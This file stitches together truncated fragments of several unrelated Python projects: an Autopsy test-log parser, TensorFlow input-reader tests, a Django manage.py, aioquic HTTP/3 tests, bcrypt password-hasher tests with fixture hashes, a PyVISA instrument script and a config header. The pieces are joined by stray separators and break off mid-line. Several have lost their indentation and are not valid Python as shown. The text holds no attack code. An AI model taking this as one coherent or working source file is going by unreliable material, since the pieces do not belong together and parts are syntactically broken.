        ingest_line = search_logs("Ingest (including enqueue)", test_data)[0]
        test_data.total_ingest_time = get_word_at(ingest_line, 6).rstrip()
        message_line_count = find_msg_in_log_set("Ingest messages count:", test_data)
        # BUG FIX: this count was previously stored in indexed_files and then
        # immediately overwritten by the "Indexed files count" below (dead
        # store, losing the messages count). Keep it in its own attribute.
        # NOTE(review): attribute name inferred from the surrounding pattern
        # -- confirm against TestData's definition.
        test_data.ingest_messages = message_line_count
        files_line_count = find_msg_in_log_set("Indexed files count:", test_data)
        test_data.indexed_files = files_line_count
        chunks_line_count = find_msg_in_log_set("Indexed file chunks count:", test_data)
        test_data.indexed_chunks = chunks_line_count
    except (OSError, IOError) as e:
        Errors.print_error("Error: Unable to find the required information to fill test_config data.")
        Errors.print_error(str(e) + "\n")
        logging.critical(traceback.format_exc())
        print(traceback.format_exc())
    try:
        service_lines = find_msg_in_log("autopsy.log.0", "to process()", test_data)
        service_list = []
        for line in service_lines:
            words = line.split(" ")
            # Kind of forcing our way into getting this data
            # If this format changes, the tester will break
            i = words.index("secs.")
            # The five words ending at "secs." hold the service timing info.
            times = " ".join(words[i - 4:i + 1])
            service_list.append(times)
        test_data.service_times = "; ".join(service_list)
    except (OSError, IOError) as e:
        Errors.print_error("Error: Unknown fatal error when finding service times.")
        Errors.print_error(str(e) + "\n")
        logging.critical(traceback.format_exc())
def _report_all_errors(test_data=None):
    """Generate a list of all the errors found in the common log.

    Args:
        test_data: the TestData whose logs are searched. This parameter was
            missing before, although get_warnings() and get_exceptions()
            both require it -- every call raised TypeError. It defaults to
            None for signature compatibility.

    Returns:
        a listof_String, the errors found in the common log
    """
    try:
        # BUG FIX: forward test_data; the original zero-argument calls to
        # get_warnings()/get_exceptions() could never have succeeded.
        return get_warnings(test_data) + get_exceptions(test_data)
    except (OSError, IOError) as e:
        Errors.print_error("Error: Unknown fatal error when reporting all errors.")
        Errors.print_error(str(e) + "\n")
        logging.warning(traceback.format_exc())
def search_common_log(string, test_data):
    """Search the common log for any instances of a given string.

    Args:
        string: the String to search for.
        test_data: the TestData that holds the log to search.

    Returns:
        a listof_String, all the lines that the string is found on
    """
    # "with" guarantees the log is closed even if iteration raises
    # (e.g. a UnicodeDecodeError part-way through the file); the original
    # leaked the handle on any such error.
    with codecs.open(test_data.common_log_path, "r", "utf_8") as log:
        return [line for line in log if string in line]
def print_report(errors, name, okay):
    """Print a report with the specified information.

    Args:
        errors: a listof_String, the errors to report.
        name: a String, the name of the report.
        okay: the String to print when there are no errors.
    """
    # No errors: print the "all clear" banner and bail out early.
    if not errors:
        divider = "-----------------------------------------------------------------"
        Errors.print_out(divider)
        Errors.print_out("< " + name + " - " + okay + " />")
        Errors.print_out(divider + "\n")
        return
    # Otherwise dump each error between named delimiters.
    Errors.print_error("--------< " + name + " >----------")
    for err in errors:
        Errors.print_error(str(err))
    Errors.print_error("--------< / " + name + " >--------\n")
def get_exceptions(test_data):
    """Get a list of the exceptions in the autopsy logs.

    Args:
        test_data: the TestData to use to find the exceptions.

    Returns:
        a listof_String, the exceptions found in the logs.
    """
    exceptions = []
    logs_path = test_data.logs_dir
    # Compile once, outside the loop. Raw strings keep "\S" a regex escape
    # instead of an invalid string escape (a DeprecationWarning in Python 3).
    ex = re.compile(r"\SException")
    er = re.compile(r"\SError")
    for file_name in os.listdir(logs_path):
        if "autopsy.log" not in file_name:
            continue
        # "with" closes each log even if decoding fails part-way through;
        # also drops the unused `results` list and the shadowed builtin
        # `file` from the original.
        with codecs.open(make_path(logs_path, file_name), "r", "utf_8") as log:
            for line in log:
                if ex.search(line) or er.search(line):
                    exceptions.append(line)
    return exceptions
def get_warnings(test_data):
    """Get a list of the warnings listed in the common log.

    Args:
        test_data: the TestData to use to find the warnings

    Returns:
        listof_String, the warnings found.
    """
    # Case-insensitive scan of the warning log for "warning" lines.
    with codecs.open(test_data.warning_log, "r", "utf_8") as warning_log:
        return [line for line in warning_log if "warning" in line.lower()]
def copy_logs(test_data):
"""Copy the Autopsy generated logs to output directory.
Args:
test_data: the TestData whose logs will be copied
"""
try:
# copy logs from autopsy case's Log folder
if test_data.isMultiUser:
log_dir = os.path.join(test_data.output_path, AUTOPSY_TEST_CASE, socket.gethostname(), "Log")
else:
log_dir = os.path.join(test_data.output_path, AUTOPSY_TEST_CASE, "Log")
shutil.copytree(log_dir, test_data.logs_d |
17
queue_capacity = 1234
name = "my_batch"
features = {"feature": tf.FixedLenFeature(shape=[0], dtype=tf.float32)}
with tf.Graph().as_default() as g, self.test_session(graph=g) as sess:
features = tf.contrib.learn.io.read_batch_record_features(
_VALID_FILE_PATTERN, batch_size, features, randomize_input=False,
queue_capacity=queue_capacity, reader_num_threads=2,
parser_num_threads=2, name=name)
self.assertEqual("%s/fifo_queue_1_Dequeue:0" % name,
features["feature"].name)
file_name_queue_name = "%s/file_name_queue" % name
file_names_name = "%s/input" % file_name_queue_name
example_queue_name = "%s/fifo_queue" % name
parse_example_queue_name = "%s/fifo_queue" % name
op_nodes = test_util.assert_ops_in_graph({
file_names_name: "Const",
file_name_queue_name: "FIFOQueue",
"%s/read/TFRecordReader" % name: "TFRecordReader",
example_queue_name: "FIFOQueue",
parse_example_queue_name: "FIFOQueue",
name: "QueueDequeueMany"
}, g)
self.assertAllEqual(_FILE_NAMES, sess.run(["%s:0" % file_names_name])[0])
self.assertEqual(
queue_capacity, op_nodes[example_queue_name].attr["capacity"].i)
    def test_one_epoch(self):
        """num_epochs=1 builds an epoch-limited reading graph.

        Asserts the op names/types created by read_batch_examples (including
        the limit_epochs counter variable) and the shuffle-queue capacity.
        """
        batch_size = 17
        queue_capacity = 1234
        name = "my_batch"
        with tf.Graph().as_default() as g, self.test_session(graph=g) as sess:
            inputs = tf.contrib.learn.io.read_batch_examples(
                _VALID_FILE_PATTERN, batch_size,
                reader=tf.TFRecordReader, randomize_input=True,
                num_epochs=1,
                queue_capacity=queue_capacity, name=name)
            self.assertEqual("%s:1" % name, inputs.name)
            file_name_queue_name = "%s/file_name_queue" % name
            # num_epochs adds a limit_epochs counter under the file-name queue.
            file_name_queue_limit_name = (
                "%s/limit_epochs/epochs" % file_name_queue_name)
            file_names_name = "%s/input" % file_name_queue_name
            example_queue_name = "%s/random_shuffle_queue" % name
            # NOTE: these names depend on the exact graph-construction order
            # inside read_batch_examples.
            op_nodes = test_util.assert_ops_in_graph({
                file_names_name: "Const",
                file_name_queue_name: "FIFOQueue",
                "%s/read/TFRecordReader" % name: "TFRecordReader",
                example_queue_name: "RandomShuffleQueue",
                name: "QueueDequeueUpTo",
                file_name_queue_limit_name: "Variable"
            }, g)
            self.assertEqual(
                set(_FILE_NAMES), set(sess.run(["%s:0" % file_names_name])[0]))
            self.assertEqual(
                queue_capacity, op_nodes[example_queue_name].attr["capacity"].i)
    def test_batch_randomized(self):
        """Randomized reading (no epoch limit) uses a RandomShuffleQueue.

        Asserts the op names/types created by read_batch_examples and the
        shuffle-queue capacity.
        """
        batch_size = 17
        queue_capacity = 1234
        name = "my_batch"
        with tf.Graph().as_default() as g, self.test_session(graph=g) as sess:
            inputs = tf.contrib.learn.io.read_batch_examples(
                _VALID_FILE_PATTERN, batch_size,
                reader=tf.TFRecordReader, randomize_input=True,
                queue_capacity=queue_capacity, name=name)
            self.assertEqual("%s:1" % name, inputs.name)
            file_name_queue_name = "%s/file_name_queue" % name
            file_names_name = "%s/input" % file_name_queue_name
            example_queue_name = "%s/random_shuffle_queue" % name
            # Without num_epochs the dequeue is QueueDequeueMany (full batches).
            op_nodes = test_util.assert_ops_in_graph({
                file_names_name: "Const",
                file_name_queue_name: "FIFOQueue",
                "%s/read/TFRecordReader" % name: "TFRecordReader",
                example_queue_name: "RandomShuffleQueue",
                name: "QueueDequeueMany"
            }, g)
            self.assertEqual(
                set(_FILE_NAMES), set(sess.run(["%s:0" % file_names_name])[0]))
            self.assertEqual(
                queue_capacity, op_nodes[example_queue_name].attr["capacity"].i)
def _create_temp_file(self, lines):
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "temp_file")
gfile.Open(filename, "w").write(lines)
return filename
def _create_sorted_temp_files(self, lines_list):
tempdir = tempfile.mkdtemp()
filenames = []
for i, lines in enumerate(lines_list):
filename = os.path.join(tempdir, "temp_file%05d" % i)
gfile.Open(filename, "w").write(lines)
filenames.append(filename)
return filenames
    def test_read_text_lines(self):
        """Reads a 3-line text file one example at a time for one epoch."""
        gfile.Glob = self._orig_glob
        filename = self._create_temp_file("ABC\nDEF\nGHK\n")
        batch_size = 1
        queue_capacity = 5
        name = "my_batch"
        with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
            inputs = tf.contrib.learn.io.read_batch_examples(
                filename, batch_size, reader=tf.TextLineReader,
                randomize_input=False, num_epochs=1, queue_capacity=queue_capacity,
                name=name)
            # num_epochs uses a local variable that must be initialized.
            session.run(tf.initialize_local_variables())
            coord = tf.train.Coordinator()
            tf.train.start_queue_runners(session, coord=coord)
            self.assertAllEqual(session.run(inputs), [b"ABC"])
            self.assertAllEqual(session.run(inputs), [b"DEF"])
            self.assertAllEqual(session.run(inputs), [b"GHK"])
            # The single epoch is exhausted after the three lines.
            with self.assertRaises(errors.OutOfRangeError):
                session.run(inputs)
            coord.request_stop()
    def test_read_text_lines_multifile(self):
        """Reads lines across two files in sorted-file order, one epoch."""
        gfile.Glob = self._orig_glob
        filenames = self._create_sorted_temp_files(["ABC\n", "DEF\nGHK\n"])
        batch_size = 1
        queue_capacity = 5
        name = "my_batch"
        with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
            inputs = tf.contrib.learn.io.read_batch_examples(
                filenames, batch_size, reader=tf.TextLineReader,
                randomize_input=False, num_epochs=1, queue_capacity=queue_capacity,
                name=name)
            # num_epochs uses a local variable that must be initialized.
            session.run(tf.initialize_local_variables())
            coord = tf.train.Coordinator()
            tf.train.start_queue_runners(session, coord=coord)
            # Lines arrive file-by-file because randomize_input is False.
            self.assertAllEqual(session.run(inputs), [b"ABC"])
            self.assertAllEqual(session.run(inputs), [b"DEF"])
            self.assertAllEqual(session.run(inputs), [b"GHK"])
            with self.assertRaises(errors.OutOfRangeError):
                session.run(inputs)
            coord.request_stop()
    def test_batch_text_lines(self):
        """Batches of 3 over 5 lines: one full batch then a partial one."""
        gfile.Glob = self._orig_glob
        filename = self._create_temp_file("A\nB\nC\nD\nE\n")
        batch_size = 3
        queue_capacity = 10
        name = "my_batch"
        with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
            inputs = tf.contrib.learn.io.read_batch_examples(
                [filename], batch_size, reader=tf.TextLineReader,
                randomize_input=False, num_epochs=1, queue_capacity=queue_capacity,
                read_batch_size=10, name=name)
            # num_epochs uses a local variable that must be initialized.
            session.run(tf.initialize_local_variables())
            coord = tf.train.Coordinator()
            tf.train.start_queue_runners(session, coord=coord)
            self.assertAllEqual(session.run(inputs), [b"A", b"B", b"C"])
            # Final batch is short (2 of 3) because the epoch ends.
            self.assertAllEqual(session.run(inputs), [b"D", b"E"])
            with self.assertRaises(errors.OutOfRangeError):
                session.run(inputs)
            coord.request_stop()
    def test_keyed_read_text_lines(self):
        """Keyed reading yields (key, line) where key is "<filename>:<lineno>"."""
        gfile.Glob = self._orig_glob
        filename = self._create_temp_file("ABC\nDEF\nGHK\n")
        batch_size = 1
        queue_capacity = 5
        name = "my_batch"
        with tf.Graph().as_default() as g, self.test_session(graph=g) as session:
            keys, inputs = tf.contrib.learn.io.read_keyed_batch_examples(
                filename, batch_size,
                reader=tf.TextLineReader, randomize_input=False,
                num_epochs=1, queue_capacity=queue_capacity, name=name)
            # num_epochs uses a local variable that must be initialized.
            session.run(tf.initialize_local_variables())
            coord = tf.train.Coordinator()
            tf.train.start_queue_runners(session, coord=coord)
            # TextLineReader keys are 1-based line numbers appended to the path.
            self.assertAllEqual(session.run([keys, inputs]),
                                [[filename.encode("utf-8") + b":1"], [b"ABC"]])
            self.assertAllEqual(session.run([keys, inputs]),
                                [[filename.encode("utf-8") + b":2"], [b"DEF"]])
            self.assertAllEqual(session.run([keys, inputs]),
                                [[filename.encode("utf-8") + b":3"], [b"GHK"]])
            with self.assertRaises(errors.OutOfRangeError):
                session.run(inputs)
            coord.request_stop()
def test_keyed_parse_json(self):
gfile.Glob = self._orig_glob
filename = self._create_temp_file(
'{"features": {"feature": {"age": {" |
#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    # The settings module must be configured before Django reads it.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "weibome.settings")
    # Imported here (not at top of file) so DJANGO_SETTINGS_MODULE above is
    # already in the environment when Django initializes.
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| |
quic_server.closed,
(
ErrorCode.HTTP_FRAME_UNEXPECTED,
"DATA frame is not allowed in this state",
),
)
def test_handle_request_frame_headers_after_trailers(self):
"""
We should not receive HEADERS after receiving trailers.
"""
quic_client = FakeQuicConnection(
configuration=QuicConfiguration(is_client=True)
)
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_client = H3Connection(quic_client)
h3_server = H3Connection(quic_server)
stream_id = quic_client.get_next_available_stream_id()
h3_client.send_headers(
stream_id=stream_id,
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
],
)
h3_client.send_headers(
stream_id=stream_id, headers=[(b"x-some-trailer", b"foo")], end_stream=True
)
h3_transfer(quic_client, h3_server)
h3_server.handle_event(
StreamDataReceived(
stream_id=0, data=encode_frame(FrameType.HEADERS, b""), end_stream=False
)
)
self.assertEqual(
quic_server.closed,
(
ErrorCode.HTTP_FRAME_UNEXPECTED,
"HEADERS frame is not allowed in this state",
),
)
def test_handle_request_frame_push_promise_from_client(self):
"""
A server should not receive PUSH_PROMISE on a request stream.
"""
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_server = H3Connection(quic_server)
h3_server.handle_event(
StreamDataReceived(
stream_id=0,
data=encode_frame(FrameType.PUSH_PROMISE, b""),
end_stream=False,
)
)
self.assertEqual(
quic_server.closed,
(ErrorCode.HTTP_FRAME_UNEXPECTED, "Clients must not send PUSH_PROMISE"),
)
def test_handle_request_frame_wrong_frame_type(self):
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_server = H3Connection(quic_server)
h3_server.handle_event(
StreamDataReceived(
stream_id=0,
data=encode_frame(FrameType.SETTINGS, b""),
end_stream=False,
)
)
self.assertEqual(
quic_server.closed,
(ErrorCode.HTTP_FRAME_UNEXPECTED, "Invalid frame type on request stream"),
)
def test_request(self):
with h3_client_and_server() as (quic_client, quic_server):
h3_client = H3Connection(quic_client)
h3_server = H3Connection(quic_server)
# make first request
self._make_request(h3_client, h3_server)
# make second request
self._make_request(h3_client, h3_server)
# make third request -> dynamic table
self._make_request(h3_client, h3_server)
    def test_request_headers_only(self):
        """A HEAD exchange: request and response carry headers only, with
        end_stream set on both and no DATA frames."""
        with h3_client_and_server() as (quic_client, quic_server):
            h3_client = H3Connection(quic_client)
            h3_server = H3Connection(quic_server)
            # send request
            stream_id = quic_client.get_next_available_stream_id()
            h3_client.send_headers(
                stream_id=stream_id,
                headers=[
                    (b":method", b"HEAD"),
                    (b":scheme", b"https"),
                    (b":authority", b"localhost"),
                    (b":path", b"/"),
                    (b"x-foo", b"client"),
                ],
                end_stream=True,
            )
            # receive request: a single HeadersReceived with stream_ended=True
            events = h3_transfer(quic_client, h3_server)
            self.assertEqual(
                events,
                [
                    HeadersReceived(
                        headers=[
                            (b":method", b"HEAD"),
                            (b":scheme", b"https"),
                            (b":authority", b"localhost"),
                            (b":path", b"/"),
                            (b"x-foo", b"client"),
                        ],
                        stream_id=stream_id,
                        stream_ended=True,
                    )
                ],
            )
            # send response
            h3_server.send_headers(
                stream_id=stream_id,
                headers=[
                    (b":status", b"200"),
                    (b"content-type", b"text/html; charset=utf-8"),
                    (b"x-foo", b"server"),
                ],
                end_stream=True,
            )
            # receive response
            events = h3_transfer(quic_server, h3_client)
            self.assertEqual(
                events,
                [
                    HeadersReceived(
                        headers=[
                            (b":status", b"200"),
                            (b"content-type", b"text/html; charset=utf-8"),
                            (b"x-foo", b"server"),
                        ],
                        stream_id=stream_id,
                        stream_ended=True,
                    )
                ],
            )
def test_request_fragmented_frame(self):
quic_client = FakeQuicConnection(
configuration=QuicConfiguration(is_client=True)
)
quic_server = FakeQuicConnection(
configuration=QuicConfiguration(is_client=False)
)
h3_client = H3Connection(quic_client)
h3_server = H3Connection(quic_server)
# send request
stream_id = quic_client.get_next_available_stream_id()
h3_client.send_headers(
stream_id=stream_id,
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
(b"x-foo", b"client"),
],
)
h3_client.send_data(stream_id=stream_id, data=b"hello", end_stream=True)
# receive request
events = h3_transfer(quic_client, h3_server)
self.assertEqual(
events,
[
HeadersReceived(
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/"),
(b"x-foo", b"client"),
],
stream_id=stream_id,
stream_ended=False,
),
DataReceived(data=b"h", stream_id=0, stream_ended=False),
DataReceived(data=b"e", stream_id=0, stream_ended=False),
DataReceived(data=b"l", stream_id=0, stream_ended=False),
DataReceived(data=b"l", stream_id=0, stream_ended=False),
DataReceived(data=b"o", stream_id=0, stream_ended=False),
DataReceived(data=b"", stream_id=0, stream_ended=True),
],
)
# send push promise
push_stream_id = h3_server.send_push_promise(
stream_id=stream_id,
headers=[
(b":method", b"GET"),
(b":scheme", b"https"),
(b":authority", b"localhost"),
(b":path", b"/app.txt"),
],
)
self.assertEqual(push_stream_id, 15)
# send response
h3_server.send_headers(
stream_id=stream_id,
headers=[
(b":status", b"200"),
(b"content-type", b"text/html; charset=utf-8"),
],
end_stream=False,
)
h3_server.send_data(stream_id=stream_id, data=b"html", end_stream=True)
# fulfill push pro |
# -*- coding:utf-8 -*-
from django import test
from django.conf import settings
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.core.management import call_command
from mock import patch
from nose.tools import eq_
class BcryptTests(test.TestCase):
    """End-to-end tests for the bcrypt+HMAC password hasher.

    Covers the hash prefix stored in the DB, authentication round-trips
    (including a non-ASCII password), behaviour with no HMAC keys, HMAC
    key rotation, and transparent upgrades from legacy hash formats.
    """

    def setUp(self):
        super(BcryptTests, self).setUp()
        # Fixture users; 'jude' gets a non-ASCII password to exercise
        # unicode handling in the hasher.
        User.objects.create_user('john', 'johndoe@example.com',
                                 password='123456')
        User.objects.create_user('jane', 'janedoe@example.com',
                                 password='abc')
        User.objects.create_user('jude', 'jeromedoe@example.com',
                                 password=u'abcéäêëôøà')

    def test_bcrypt_used(self):
        """Make sure bcrypt was used as the hash."""
        # The hasher writes a 'bcrypt$' prefix into the password column.
        eq_(User.objects.get(username='john').password[:7], 'bcrypt$')
        eq_(User.objects.get(username='jane').password[:7], 'bcrypt$')
        eq_(User.objects.get(username='jude').password[:7], 'bcrypt$')

    def test_bcrypt_auth(self):
        """Try authenticating."""
        # Correct passwords succeed, wrong ones fail -- including the
        # non-ASCII credentials.
        assert authenticate(username='john', password='123456')
        assert authenticate(username='jane', password='abc')
        assert not authenticate(username='jane', password='123456')
        assert authenticate(username='jude', password=u'abcéäêëôøà')
        assert not authenticate(username='jude', password=u'çççbbbààà')

    @patch.object(settings._wrapped, 'HMAC_KEYS', dict())
    def test_nokey(self):
        """With no HMAC key, no dice."""
        # Without any HMAC keys every authentication attempt must fail,
        # even with the correct password.
        assert not authenticate(username='john', password='123456')
        assert not authenticate(username='jane', password='abc')
        assert not authenticate(username='jane', password='123456')
        assert not authenticate(username='jude', password=u'abcéäêëôøà')
        assert not authenticate(username='jude', password=u'çççbbbààà')

    def test_password_from_django14(self):
        """Test that a password generated by django_sha2 with django 1.4 is
        recognized and changed to a 1.3 version"""
        # We can't easily call 1.4's hashers so we hardcode the passwords as
        # returned with the specific salts and hmac_key in 1.4.
        prefix = 'bcrypt2011_01_01$2a$12$'
        suffix = '$2011-01-01'
        raw_hashes = {
            'john': '02CfJWdVwLK80jlRe/Xx1u8sTHAR0JUmKV9YB4BS.Os4LK6nsoLie',
            'jane': '.ipDt6gRL3CPkVH7FEyR6.8YXeQFXAMyiX3mXpDh4YDBonrdofrcG',
            'jude': '6Ol.vgIFxMQw0LBhCLtv7OkV.oyJjen2GVMoiNcLnbsljSfYUkQqe',
        }

        # check_password() on a 1.4-style hash must both succeed and
        # rewrite the stored hash into the 'bcrypt$' format.
        u = User.objects.get(username="john")
        django14_style_password = "%s%s%s" % (prefix, raw_hashes['john'],
                                              suffix)
        u.password = django14_style_password
        assert u.check_password('123456')
        eq_(u.password[:7], 'bcrypt$')

        u = User.objects.get(username="jane")
        django14_style_password = "%s%s%s" % (prefix, raw_hashes['jane'],
                                              suffix)
        u.password = django14_style_password
        assert u.check_password('abc')
        eq_(u.password[:7], 'bcrypt$')

        u = User.objects.get(username="jude")
        django14_style_password = "%s%s%s" % (prefix, raw_hashes['jude'],
                                              suffix)
        u.password = django14_style_password
        assert u.check_password(u'abcéäêëôøà')
        eq_(u.password[:7], 'bcrypt$')

    def test_hmac_autoupdate(self):
        """Auto-update HMAC key if hash in DB is outdated."""
        # Get HMAC key IDs to compare
        old_key_id = max(settings.HMAC_KEYS.keys())
        new_key_id = '2020-01-01'
        # Add a new HMAC key
        new_keys = settings.HMAC_KEYS.copy()
        new_keys[new_key_id] = 'a_new_key'
        with patch.object(settings._wrapped, 'HMAC_KEYS', new_keys):
            # Make sure the database has the old key ID.
            john = User.objects.get(username='john')
            eq_(john.password.rsplit('$', 1)[1], old_key_id)
            # Log in.
            assert authenticate(username='john', password='123456')
            # Make sure the DB now has a new password hash.
            john = User.objects.get(username='john')
            eq_(john.password.rsplit('$', 1)[1], new_key_id)

    def test_rehash(self):
        """Auto-upgrade to stronger hash if needed."""
        # Set a sha256 hash for a user. This one is "123".
        john = User.objects.get(username='john')
        john.password = ('sha256$7a49025f024ad3dcacad$aaff1abe5377ffeab6ccc68'
                         '709d94c1950edf11f02d8acb83c75d8fcac1ebeb1')
        john.save()
        # The hash should be sha256 now.
        john = User.objects.get(username='john')
        eq_(john.password.split('$', 1)[0], 'sha256')
        # Log in (should rehash transparently).
        assert authenticate(username='john', password='123')
        # Make sure the DB now has a bcrypt hash.
        john = User.objects.get(username='john')
        eq_(john.password.split('$', 1)[0], 'bcrypt')
        # Log in again with the new hash.
        assert authenticate(username='john', password='123')

    def test_management_command(self):
        """Test password update flow via management command, from default
        Django hashes, to hardened hashes, to bcrypt on log in."""
        john = User.objects.get(username='john')
        john.password = 'sha1$3356f$9fd40318e1de9ecd3ab3a5fe944ceaf6a2897eef'
        john.save()
        # The hash should be sha1 now.
        john = User.objects.get(username='john')
        eq_(john.password.split('$', 1)[0], 'sha1')
        # Simulate calling management command
        call_command('strengthen_user_passwords')
        # The hash should be 'hh' now.
        john = User.objects.get(username='john')
        eq_(john.password.split('$', 1)[0], 'hh')
        # Logging in will convert the hardened hash to bcrypt.
        assert authenticate(username='john', password='123')
        # Make sure the DB now has a bcrypt hash.
        john = User.objects.get(username='john')
        eq_(john.password.split('$', 1)[0], 'bcrypt')
        # Log in again with the new hash.
        assert authenticate(username='john', password='123')
|
#####################################
# Example how to control Agilent Function generator over GPIB
# Author, Peter Vago, NI Systems Engineer, 2016
#
# PyVISA 1.8 version is used.
# For migrating from older version (<1.5) read this: https://media.readthedocs.org/pdf/pyvisa/master/pyvisa.pdf
#
################################## | ##
import time
import sys
def open_instrument():
    """Open a VISA session to the instrument over a raw TCP socket.

    Returns:
        tuple: ``(instrument, 0)`` on success, or ``(0, 2)`` when the
        connection could not be established (2 is this script's generic
        error code).
    """
    import visa
    rm = visa.ResourceManager('')  # '' -> NI-VISA backend
    #rm = visa.ResourceManager('@py')  # If you have PyVisa-Py installed
    ## To discover instruments (GPIB): rm.list_resources()
    ## response will be like this: ('ASRL1::INSTR', 'ASRL2::INSTR', 'GPIB0::14::INSTR')
    try:
        #my_instrument = rm.open_resource('TCPIP0::127.0.0.1::6340::SOCKET')
        my_instrument = rm.open_resource('TCPIP::10.92.7.134::40010::SOCKET')
        return my_instrument, 0
    except Exception:
        # BUG FIX: was a bare "except:", which would also swallow
        # KeyboardInterrupt/SystemExit; also dropped the unused socket import.
        print("Error: Server seems to be not running.")
        return 0, 2  # 2 -> error code
def close_instrument(instr):
    """Release the VISA session held by *instr*."""
    instr.close()
def manage_client_parameters(my_instrument):
    """Tune session parameters on an open VISA instrument and echo them.

    Sets a small chunk size and a 2-second query delay, then prints the
    effective delay and read-termination character.
    """
    my_instrument.chunk_size = 15
    my_instrument.query_delay = 2
    print("=== Query delay: %d sec" % my_instrument.query_delay)
    print("=== Read termination character: %s" % str(my_instrument._read_termination))
def control(args, inst):
    """Translate command-line arguments into a SCPI command and send it.

    Parameters
    ----------
    args : list of str
        sys.argv-style vector; ``args[1]`` selects the operation
        ('start', 'stop', 'config', 'scpi-short', 'scpi', 'file').
    inst : pyvisa resource
        Open instrument session used to write the command.

    Returns
    -------
    tuple of (int, str)
        ``(0, info)`` on success, ``(2, detail)`` on argument errors.
    """
    command = 'nocommand'
    examples = ['MEASure:STARt', 'MEASEurement:STOP',
                'SENSe:FREQuency:CENTer 2.401G', 'SENS:FREQ:CENT 2400M',
                'SENS:RLEV -5', 'SENS:FREQ:SPAN 40M', 'SENS:BAND:RES 10k']
    if args[1] == 'start':
        command = 'start'
    elif args[1] == 'stop':
        command = 'stop'
    elif args[1] == 'config':
        # Needs both a parameter name and a value, e.g. "config freq 999000".
        if len(args) < 4:
            return 2, ".."
        cmd = 'config'
        param1 = args[2]
        param2 = args[3]
        # BUG FIX: the original did command="%s"%(cmd, param1, param2), which
        # raised TypeError (wrong format arity) and param2 was never assigned.
        # TODO: map (param1, param2) onto real SCPI commands (see examples).
        command = "%s %s %s" % (cmd, param1, param2)
    elif args[1] == 'scpi-short':
        if len(args) < 3:
            # No index given: list the canned examples instead.
            ind = 0
            for i in examples:
                print("%d: %s" % (ind, i))
                ind += 1
            return 0, "Usage: python test_tcp.py scpi-short <num>"
        else:
            index = int(args[2])
            command = examples[index]
    elif args[1] == 'scpi':
        if len(args) < 3:
            return 2, "--"
        cmd = args[2]  # e.g. SENS:RLEV
        if cmd[0:4] == "MEAS":
            parameter = ""
        elif cmd[0:4] == "SENS":
            # SENSe commands require a value argument.
            if len(args) < 4:
                return 2, "-"
            else:
                parameter = args[3]  # e.g. -10
        elif cmd[0:5] == "*IDN?":
            cmd = "*IDN?"
            parameter = ""
        else:
            return 2, cmd[0:4]
        command = cmd + " " + parameter
    elif args[1] == 'file':
        # Stream a script file of SCPI commands; lines starting with '#'
        # are echoed but not sent.
        # BUG FIX: the file handle was never closed; use a context manager.
        with open(args[2], 'r') as f:
            i = 0
            print("----Script started----")
            for line in f:
                if line[0] != "#":
                    print("%02d: %s" % (i, line[:-1]))
                    inst.write(line)
                else:
                    print("%02d: %s" % (i, line[:-1]))
                i += 1
            print("----Script finished----")
        return 0, ""
    else:
        return 2, "...."
    inst.write(command)
    print("*Command sent: %s" % command)
    return 0, ""
def temp():
    """Placeholder for ad-hoc *IDN? query experiments; always returns 0.

    The commented-out snippets show how to issue a query with an explicit
    query delay via pyvisa.
    """
    #print(my_instrument.query('*IDN?',13)); # 13 sec query delay, optional
    #print(my_instrument.query('*IDN?',2));
    #my_instrument.write('*IDN?',1)
    #print(my.intrument.read())
    return 0
def temp_sweep():
    """Placeholder for a linear-sweep experiment (all steps disabled).

    The reference sequence: set 50-ohm load, 1 s sweep time, 5-20 kHz span,
    enable sweep, wait 2 s, disable sweep.
    """
    #print(my_instrument.write('outp:load 50'))
    #print(my_instrument.write('sweep:time 1'))
    #print(my_instrument.write('freq:start 5000'))
    #print(my_instrument.write('freq:stop 20000'))
    #print(my_instrument.write('sweep:stat on'))
    #time.sleep(2)
    #print(my_instrument.write('sweep:stat off'))
    pass
def check_arguments(args):
    """Validate the argument vector; print usage when no operation is given.

    Returns ``(0, "")`` when at least one operation argument is present,
    ``(1, "")`` after printing the help text otherwise.
    """
    help="=========================== \n \
    Usage: python test_tcp.py <operation> <argument> \
    Where operations are: \n \
    \n \
    config : set Analyzer parameters\n \
    config freq <Hz> \
    config reflev <dBm> \
    config span <Hz> \
    config rbw <Hz> \
    start : no argument needed\n \
    stop : no argument needed\n \
    ==========================="
    if len(args) > 1:
        return 0, ""
    print ("%s"%help)
    return 1, ""
def main(args):
    """Script entry point: validate args, open the instrument, send a command.

    Returns
    -------
    int
        Exit code: 0 on success, 1 for invalid arguments, 2 when the
        instrument could not be opened.
    """
    ret = check_arguments(args)
    if ret[0] == 1:
        # BUG FIX: the original returned the tuple (1, "Invalid arguments.")
        # here while every other path returns an int, so sys.exit() in the
        # __main__ guard received a tuple. Always return an int exit code.
        print("Invalid arguments.")
        return 1
    print("=== Program started")
    inst, err = open_instrument()  # opening reference
    if err > 0:
        return 2  # 2 -> exit with error
    #manage_client_parameters(inst)
    ret = control(args, inst)
    try:
        close_instrument(inst)
    except Exception:
        # Best-effort close; the command itself already ran.
        pass
    print("=== Program stopped, Ret: %d, %s" % (ret[0], str(ret[1])))
    return ret[0]
if __name__ == '__main__':
    # Propagate the script's return code as the process exit status.
    ret = main(sys.argv)
    sys.exit(ret)
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
'''
narralyzer.config
~~~~~~~~~~~~~~~~~
Handle misc config variables.
:copyright: (c) 2016 Koninklijke Bibliotheek, by Willem-Jan Faber.
:license: GPLv3, see licence.txt for more details.
'''
from os import path, listdir
from ConfigParser import ConfigParser
import sys
